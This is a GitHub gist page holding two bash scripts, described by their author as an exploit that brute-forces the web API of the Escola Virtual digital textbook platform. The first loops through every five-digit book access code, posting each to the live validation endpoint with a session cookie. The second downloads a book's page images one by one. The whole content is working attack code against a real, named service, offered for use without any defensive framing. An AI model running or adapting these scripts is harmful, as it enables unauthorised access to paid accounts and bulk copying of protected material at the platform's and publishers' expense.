Skip to content

Instantly share code, notes, and snippets.

@ljmf00

ljmf00/bruteforce-bookid.sh

Created June 9, 2017 23:29
Show Gist options
  • Star 0 You must be signed in to star a gist
  • Fork 0 You must be signed in to fork a gist
  • Save ljmf00/f0bb4d40a5a90ec864dcf3196923480e to your computer and use it in GitHub Desktop.
Save ljmf00/f0bb4d40a5a90ec864dcf3196923480e to your computer and use it in GitHub Desktop.
Download ZIP
Escola Virtual exploit that make a brute-force attack in the web API
Raw
bruteforce-bookid.sh
#!/bin/bash
INPUT_BOOK=1
STR_BOOK_ID="00001"
INPUT_COOKIES="" #PHPSESSID Cookie ID
increment()
{
((INPUT_BOOK++))
if [ $INPUT_BOOK -lt 10 ]
then
STR_BOOK_ID="0000$INPUT_BOOK"
elif [ $INPUT_BOOK -gt 9 ] && [ $INPUT_BOOK -lt 100 ]
then
STR_BOOK_ID="000$INPUT_BOOK"
elif [ $INPUT_BOOK -gt 99 ] && [ $INPUT_BOOK -lt 1000 ]
then
STR_BOOK_ID="00$INPUT_BOOK"
elif [ $INPUT_BOOK -gt 999 ] && [ $INPUT_BOOK -lt 10000 ]
then
STR_BOOK_ID="0$INPUT_BOOK"
elif [ $INPUT_BOOK -gt 9999 ]
then
STR_BOOK_ID="$INPUT_BOOK"
else
STR_BOOK_ID="$INPUT_BOOK"
fi
}
while [ $INPUT_BOOK != 99999 ]
do
echo $STR_BOOK_ID
CMD="curl 'https://library.escolavirtual.pt/librarystudent/validateBookAccessCode' -H 'Host: library.escolavirtual.pt' -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:48.0) Gecko/20100101 Firefox/48.0' -H 'Accept: application/json, text/javascript, */*; q=0.01' -H 'Accept-Language: en-US,en;q=0.5' --compressed -H 'DNT: 1' -H 'Content-Type: application/x-www-form-urlencoded; charset=UTF-8' -H 'X-Requested-With: XMLHttpRequest' -H 'Referer: https://library.escolavirtual.pt/librarystudent/empty' -H 'Cookie: PHPSESSID=$INPUT_COOKIES' -H 'Connection: keep-alive' --data 'accessCode=$STR_BOOK_ID.02'"
#echo $CMD
eval $CMD
echo ""
increment
done
Raw
bruteforce-bookpage.sh
#!/bin/bash
INPUT_BOOK=1
MAX_BOOK_PAGES=1
STR_BOOK_ID="0001"
INPUT_COOKIES="" #PHPSESSID Cookie ID
BOOK_PUBLIC_PATH="" #Public Book Web-based Path
increment()
{
((INPUT_BOOK++))
if [ $INPUT_BOOK -lt 10 ]
then
STR_BOOK_ID="000$INPUT_BOOK"
elif [ $INPUT_BOOK -gt 9 ] && [ $INPUT_BOOK -lt 100 ]
then
STR_BOOK_ID="00$INPUT_BOOK"
elif [ $INPUT_BOOK -gt 99 ] && [ $INPUT_BOOK -lt 1000 ]
then
STR_BOOK_ID="0$INPUT_BOOK"
elif [ $INPUT_BOOK -gt 999 ] && [ $INPUT_BOOK -lt 10000 ]
then
STR_BOOK_ID="$INPUT_BOOK"
else
STR_BOOK_ID="$INPUT_BOOK"
fi
}
while [ $INPUT_BOOK != ($MAX_BOOK_PAGES + 1) ]
do
echo $STR_BOOK_ID
CMD="curl '$BOOK_PUBLIC_PATH/page$STR_BOOK_ID.svgz' -H 'Host: www.escolavirtual.pt' -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:48.0) Gecko/20100101 Firefox/48.0' -H 'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8' -H 'Accept-Language: en-US,en;q=0.5' --compressed -H 'DNT: 1' -H 'Referer: $BOOK_PUBLIC_PATH/page$STR_BOOK_ID.xhtml' -H 'Cookie: ZDEDebuggerPresent=php,phtml,php3; PHPSESSID=$INPUT_COOKIES' -H 'Connection: keep-alive' -o book/$STR_BOOK_ID.svgz"
#echo $CMD
eval $CMD
echo ""
increment
done
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment